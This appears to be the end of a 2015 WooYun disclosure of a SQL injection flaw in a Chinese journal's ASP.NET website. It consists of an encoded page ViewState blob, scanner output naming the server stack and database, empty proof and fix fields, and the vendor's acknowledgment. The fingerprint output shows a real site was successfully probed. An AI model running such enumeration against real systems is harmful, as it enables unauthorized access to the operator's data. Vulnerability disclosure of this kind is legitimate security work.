mliDpobU8L2E+PC9saT48bGkgb25tb3VzZW92ZXI9InNob3dTdWJNZW51KHRoaXMpIiBvbm1vdXNlb3V0PSJoaWRlU3ViTWVudSh0aGlzKSI+PGEgaHJlZj0iL0NvcnAvMTAuYXNweCI+5pyf5YiK566A5LuLPC9hPiA8dWw+PGxpPjxhIGhyZWY9Ii9Db3JwLzEwLmFzcHgiPuacn+WIiuS7i+e7jTwvYT48L2xpPjxsaT48YSBocmVmPSIvQ29ycC8yMC5hc3B4Ij7nvJblp5TnroDku4s8L2E+PC9saT48L3VsPjwvbGk+PGxpIG9ubW91c2VvdmVyPSJzaG93U3ViTWVudSh0aGlzKSIgb25tb3VzZW91dD0iaGlkZVN1Yk1lbnUodGhpcykiPjxhIGhyZWY9Ii9vYS8iPuaWh+eroOafpeivojwvYT4gPHVsPjxsaT48YSBocmVmPSIvT0EvT0FNTC5hc3B4Ij7mnIDmlrDkuIDmnJ88L2E+PC9saT48bGk+PGEgaHJlZj0iL29hLyI+5paH56ug5p+l6K+iPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9vYS9kbGlzdG51bS5hc3B4Ij7mlofnq6DmgLvnm648L2E+PC9saT48bGk+PGEgaHJlZj0iL29hL2RlZmluZGV4bnVtLmFzcHg/aWQ9MSI+5LiL6L295o6S5ZCNPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9vYS9kZWZpbmRleG51bS5hc3B4Ij7mtY/op4jmjpLlkI08L2E+PC9saT48L3VsPjwvbGk+PGxpIG9ubW91c2VvdmVyPSJzaG93U3ViTWVudSh0aGlzKSIgb25tb3VzZW91dD0iaGlkZVN1Yk1lbnUodGhpcykiPjxhIGhyZWY9Ii9kb2NzL3R6L2RlZmF1bHQuYXNweCI+6YCa55+l5YWs5ZGKPC9hPiA8L2xpPjxsaT48YSBocmVmPSIvZG9jcy96enlkL2RlZmF1bHQuYXNweCI+5L2c6ICF5Zut5ZywPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9Db3JwLzYwLmFzcHgiPuaKleeov+mhu+efpTwvYT48L2xpPjxsaSBvbm1vdXNlb3Zlcj0ic2hvd1N1Yk1lbnUodGhpcykiIG9ubW91c2VvdXQ9ImhpZGVTdWJNZW51KHRoaXM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2MDY4LTMxQjgtNDZENS1CQTdCLUJGMjVDNjYzN0M5RmRkAgYPZBYCAgEPDxYGHwEFKuaIkeagoemmluasoeW9k+mAieS4reWbvemrmOagoeenkeaKgOacny4uLh8IBT/miJHmoKHpppbmrKHlvZPpgInkuK3lm73pq5jmoKHnp5HmioDmnJ/liIrnoJTnqbbkvJrnkIbkuovljZXkvY0fCQVPfi9kb2NzL3h3ZHQvZGV0YWlscy5hc3B4P2RvY3VtZW50aWQ9MjImTmlkPTA1Q0ZCM0FBLTYyQzYtNDZGOS05ODcxLUIyMDNDRkNFQkRFM2RkAgIPFgIfAmhkAgIPFgIeCWlubmVyaHRtbAWAFzx1bD48bGk+PHNwYW4gY2xhc3M9J3llYXInPjxhIGhyZWY9JyMnPjIwMTU8L2E+PC9zcGFuPjxzcGFuIGNsYXNzPSdudW1iZXInPjxhIHN0eWxlPSdjdXJzb3I6aGFuZCcgdGFyZ2V0PSdfYmxhbmsnIGhyZWY9Jy9vYS9zY3JpcHRsc2l0LmFzcHg/a2luZD1Jc3N1ZSZpc3NudW09MDHmnJ8meWVhcj0yMDE15bm0Jz4wMeacnzwvYT48L3NwYW4+PHNwYW4gY2xhc3M9J251bWJlcic+PGEgc3R5bGU9J2N1cnNvcjpoYW5kJyB0YXJnZXQ9J19ibGFuaycgaHJlZj0nL29hL3NjcmlwdGxzaXQuYXNweD9raW5kPUlzc3VlJmlzc251bT0wMuacnyZ5ZWFyPTIwMTXlubQnPjAy5pyfPC9hPjwvc3Bhbj48c3BhbiBjbGFzcz0nbnVtYmVyJz48YSBzdHlsZT0nY3Vyc29yOmhhbmQnIHRhcmdldD0nX2JsYW5rJyBocmVmPScvb2Evc2NyaXB0bHNpdC5hc3B4P2tpbmQ9SXNzdWUmaXNzbnVtPTAz5pyfJnllYXI9MjAxNeW5tCc+MDPmnJ88L2E+PC9zcGFuPjwvbGk+PGxpPjxzcGFuIGNsYXNzPSd5ZWFyJz48YSBocmVmPScjJz4yMDE0PC9hPjwvc3Bhbj48c3BhbiBjbGFzcz0nbnVtYmVyJz48YSBzdHlsZT0nY3Vyc29yOmhhbmQnIHRhcmdldD0nX2JsYW5rJyBocmVmPScvb2Evc2NyaXB0bHNpdC5hc3B4P2tpbmQ9SXNzdWUmaXNzbnVtPTAx5pyfJnllYXI9MjAxNOW5tCc+MDHmnJ88L2E+PC9zcGFuPjxzcGFuIGNsYXNzPSdudW1iZXInPjxhIHN0eWxlPSdjdXJzb3I6aGFuZCcgdGFyZ2V0PSdfYmxhbmsnIGhyZWY9Jy9vYS9zY3JpcHRsc2l0LmFzcHg/a2luZD1Jc3N1ZSZpc3NudW09MDLmnJ8meWVhcj0yMDE05bm0Jz4wMuacnzwvYT48L3NwYW4+PHNwYW4gY2xhc3M9J251bWJlcic+PGEgc3R5bGU9J2N1cnNvcjpoYW5kJyB0YXJnZXQ9J19ibGFuaycgaHJlZj0nL29hL3NjcmlwdGxzaXQuYXNweD9raW5kPUlzc3VlJmlzc251bT0wM+acnyZ5ZWFyPTIwMTTlubQnPjAz5pyfPC9hPjwvc3Bhbj48c3BhbiBjbGFzcz0nbnVtYmVyJz48YSBzdHlsZT0nY3Vyc29yOmhhbmQnIHRhcmdldD0nX2JsYW5rJyBocmVmPScvb2Evc2NyaXB0bHNpdC5hc3B4P2tpbmQ9SXNzdWUmaXNzbnVtPTA05pyfJnllYXI9MjAxNOW5tCc+MDTmnJ88L2E+PC9zcGFuPjwvbGk+PGxpPjxzcGFuIGNsYXNzPSd5ZWFyJz48YSBocmVmPScjJz4yMDEzPC9hPjwvc3Bhbj48c3BhbiBjbGFzcz0nbnVtYmVyJz48YSBzdHlsZT0nY3Vyc29yOmhhbmQnIHRhcmdldD0nX2JsYW5rJyBocmVmPScvb2Evc2NyaXB0bHNpdC5hc3B4P2tpbmQ9SXNzdWUmaXNzbnVtPTAx5pyfJnllYXI9MjAxM+W5tCc+MDHmnJ88L2E+PC9zcGFuPjxzcGFuIGNsYXNzPSdudW1iZXInPjxhIHN0eWxlPSdjdXJzb3I6aGFuZCcgdGFyZ2V0PSdfYmxhbmsnIGhyZWY9Jy9vYS9zY3JpcHRsc2l0LmFzcHg/a2luZD1Jc3N1ZSZpc3NudW09MDLmnJ8meWVhcj0yMDEz5bm0Jz4wMuacnzwvYT48L3NwYW4+PHNwYW4gY2xhc3M9J251bWJlcic+PGEgc3R5bGU9J2N1cnNvcjpoYW5kJyB0YXJnZXQ9J19ibGFuaycgaHJlZj0nL29hL3NjcmlwdGxzaXQuYXNweD9raW5kPUlzc3VlJmlzc251bT0wM+acnyZ5ZWFyPTIwMTPlubQnPjAz5pyfPC9hPjwvc3Bhbj48c3BhbiBjbGFzcz0nbnVtYmVyJz48YSBzdHlsZT0nY3Vyc29yOmhhbmQnIHRhcmdldD0nX2JsYW5rJyBocmVmPScvb2Evc2NyaXB0bHNpdC5hc3B4P2tpbmQ9SXNzdWUmaXNzbnVtPTA05pyfJnllYXI9MjAxM+W5tCc+MDTmnJ88L2E+PC9zcGFuPjwvbGk+PGxpPjxzcGFuIGNsYXNzPSd5ZWFyJz48YSBocmVmPScjJz4yMDEyPC9hPjwvc3Bhbj48c3BhbiBjbGFzcz0nbnVtYmVyJz48YSBzdHlsZT0nY3Vyc29yOmhhbmQnIHRhcmdldD0nX2JsYW5rJyBocmVmPScvb2Evc2NyaXB0bHNpdC5hc3B4P2tpbmQ9SXNzdWUmaXNzbnVtPTAx5pyfJnllYXI9MjAxMuW5tCc+MDHmnJ88L2E+PC9zcGFuPjxzcGFuIGNsYXNzPSdudW1iZXInPjxhIHN0eWxlPSdjdXJzb3I6aGFuZCcgdGFyZ2V0PSdfYmxhbmsnIGhyZWY9Jy9vYS9zY3JpcHRsc2l0LmFzcHg/a2luZD1Jc3N1ZSZpc3NudW09MDLmnJ8meWVhcj0yMDEy5bm0Jz4wMuacnzwvYT48L3NwYW4+PHNwYW4gY2xhc3M9J251bWJlcic+PGEgc3R5bGU9J2N1cnNvcjpoYW5kJyB0YXJnZXQ9J19ibGFuaycgaHJlZj0nL29hL3NjcmlwdGxzaXQuYXNweD9raW5kPUlzc3VlJmlzc251bT0wM+acnyZ5ZWFyPTIwMTLlubQnPjAz5pyfPC9hPjwvc3Bhbj48c3BhbiBjbGFzcz0nbnVtYmVyJz48YSBzdHlsZT0nY3Vyc29yOmhhbmQnIHRhcmdldD0nX2JsYW5rJyBocmVmPScvb2Evc2NyaXB0bHNpdC5hc3B4P2tpbmQ9SXNzdWUmaXNzbnVtPTA05pyfJnllYXI9MjAxMuW5tCc+MDTmnJ88L2E+PC9zcGFuPjwvbGk+PGxpPjxzcGFuIGNsYXNzPSd5ZWFyJz48YSBocmVmPScjJz4yMDExPC9hPjwvc3Bhbj48c3BhbiBjbGFzcz0nbnVtYmVyJz48YSBzdHlsZT0nY3Vyc29yOmhhbmQnIHRhcmdldD0nX2JsYW5rJyBocmVmPScvb2Evc2NyaXB0bHNpdC5hc3B4P2tpbmQ9SXNzdWUmaXNzbnVtPTAx5pyfJnllYXI9MjAxMeW5tCc+MDHmnJ88L2E+PC9zcGFuPjxzcGFuIGNsYXNzPSdudW1iZXInPjxhIHN0eWxlPSdjdXJzb3I6aGFuZCcgdGFyZ2V0PSdfYmxhbmsnIGhyZWY9Jy9vYS9zY3JpcHRsc2l0LmFzcHg/a2luZD1Jc3N1ZSZpc3NudW09MDLmnJ8meWVhcj0yMDEx5bm0Jz4wMuacnzwvYT48L3NwYW4+PHNwYW4gY2xhc3M9J251bWJlcic+PGEgc3R5bGU9J2N1cnNvcjpoYW5kJyB0YXJnZXQ9J19ibGFuaycgaHJlZj0nL29hL3NjcmlwdGxzaXQuYXNweD9raW5kPUlzc3VlJmlzc251bT0wM+acnyZ5ZWFyPTIwMTHlubQnPjAz5pyfPC9hPjwvc3Bhbj48c3BhbiBjbGFzcz0nbnVtYmVyJz48YSBzdHlsZT0nY3Vyc29yOmhhbmQnIHRhcmdldD0nX2JsYW5rJyBocmVmPScvb2Evc2NyaXB0bHNpdC5hc3B4P2tpbmQ9SXNzdWUmaXNzbnVtPTA05pyfJnllYXI9MjAxMeW5tCc+MDTmnJ88L2E+PC9zcGFuPjwvbGk+PC91bD5kAgMPZBYGZg8WAh8HZmQCAg8WAh8HAgUWCgIBD2QWAmYPFQIBOBjmuZbljZfnnIHmlrDpl7vlh7rniYjlsYBkAgIPZBYCZg8VAgE2GOS4reWNl+ael+S4muenkeaKgOWkp+WtpmQCAw9kFgJmDxUCATch5Lit5Y2X5p6X5Lia56eR5oqA5aSn5a2m5pyf5YiK56S+ZAIED2QWAmYPFQIBMiTkuK3lm73pq5jmoKHoh6rnhLbnp5HlrablrabmiqXnoJTnqbZkAgUPZBYCZg8VAgExHuS4reWbveenkeaKgOacn+WIiue8lui+keWtpuS8mmQCBA8QDxYCHwJoZGQWAGQCBw9kFgICAQ8PFgIfAQXSBjxzcGFuIGNsYXNzPSJjb3B5cmlnaHQiPjxzcGFuIHN0eWxlPSJGT05ULUZBTUlMWTogVGltZXMgTmV3IFJvbWFuOyBGT05ULVNJWkU6IDEycHQiPjxzcGFuIHN0eWxlPSJGT05ULUZBTUlMWTog5a6L5L2TIj7niYjmnYPlvZLkuK3ljZfmnpfkuJrnp5HmioDlpKflrabmnJ/liIrnpL7miYDmnIk8L3NwYW4+Jm5ic3A7IDxzcGFuIHN0eWxlPSJGT05ULUZBTUlMWTogVGltZXMgTmV3IFJvbWFuOyBGT05ULVNJWkU6IDEycHQiPkFsbCBSaWdodHMgUmVzZXJ2ZWQmbmJzcDsgPC9zcGFuPjxhIGhyZWY9Imh0dHA6Ly93d3cudGV4dGNsaWNrLmNvbS92aWV3bWFpbi5hc3A/bmFtZT1jZW9jaW8iIHRhcmdldD0iX2JsYW5rIj48L2E+Q29weXJpZ2h0ICYjMTY5OyAyMDAwLTIwMTAmbmJzcDsmbmJzcDs8L3NwYW4+PC9zcGFuPjxzcGFuIHN0eWxlPSJGT05ULUZBTUlMWTogVGltZXMgTmV3IFJvbWFuOyBGT05ULVNJWkU6IDEycHQiPiZuYnNwOzxzcGFuIHN0eWxlPSJGT05ULUZBTUlMWTog5a6L5L2TIj48YnIgLz48L3NwYW4+5Zyw5Z2A77ya5rmW5Y2X55yB6ZW/5rKZ5biC6Z+25bGx5Y2X6LevNDk45Y+3Jm5ic3A7Jm5ic3A7IOeUteivne+8mjA3MzEtODU2NTg1MjYmbmJzcDsmbmJzcDsmbmJzcDsgRS1tYWls77yaPC9zcGFuPjxzcGFuIHN0eWxlPSJGT05ULUZBTUlMWTogVGltZXMgTmV3IFJvbWFuOyBGT05ULVNJWkU6IDEycHQiPjxzcGFuIHN0eWxlPSJGT05ULUZBTUlMWTogVGltZXMgTmV3IFJvbWFuOyBGT05ULVNJWkU6IDEycHQiPjxhIGhyZWY9Im1haWx0bzpqamx5ai1jc2Z1QDE2My5jb20iPmpqbHlqLWNzZnVAMTYzLmNvbTwvYT4mbmJzcDsmbmJzcDsgPGJyIC8+PGJyIC8+PC9zcGFuPjwvc3Bhbj5kZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUYY3RsMDAkY3BoQ29udGVjdCRjYkFncmVlAsgwXztTMxYeylkgRSlcTFGc00Y=
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
current database:    'jjlyj'

漏洞证明:

修复方案:

版权声明:转载请注明来源 凉凉@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2015-11-26 11:13

厂商回复:

谢谢

最新状态:

暂无